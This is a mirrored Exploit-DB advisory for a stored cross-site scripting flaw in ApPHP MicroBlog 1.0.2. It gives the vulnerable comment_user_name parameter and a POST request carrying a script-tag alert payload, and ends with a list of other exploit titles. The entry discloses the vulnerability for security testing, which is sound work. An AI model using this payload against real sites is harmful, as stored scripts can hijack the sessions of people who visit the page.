ApPHP MicroBlog 1.0.2 – Persistent Cross-Site Scripting

Exploit Database
16 阅读

作者： Besim

日期： 2016-10-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/40505/

# Exploit Title :ApPHP MicroBlog 1.0.2- Stored Cross
Site Scripting
# Author :Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform :PHP
# Vendor Homepage : -
# Software link :http://www.scriptdungeon.com/jump.php?ScriptID=9162

Description : 

Vulnerable link : http://site_name/path/index.php?page=posts&post_id=

Stored XSS Payload ( Comments ): *

# Vulnerable URL :
http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name

############POST DATA ############

task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
your comment

############ ######################

last Exploits
ApPHP MicroBlog 1.0.2 – Persistent Cross-Site Scripting的更多信息

WordPress Plugin Form Maker 1.13.3 – SQL Injection：
Website Auction Marketplace 2.0.5 – ‘cat_id’ SQL Injection：
Eibiz i-Media Server Digital Signage 3.8.0 – Privilege Escalation：
Netartmedia Deals Portal – ‘Email’ SQL Injection：
Web Based Quiz System 1.0 – ‘MCQ options’ Persistent Cross-Site Scripting：
Simple Client Management System 1.0 – ‘uemail’ SQL Injection (Unauthenticated)：
Centreon 19.10.5 – ‘id’ SQL Injection：
elaniin CMS 1.0 – Authentication Bypass：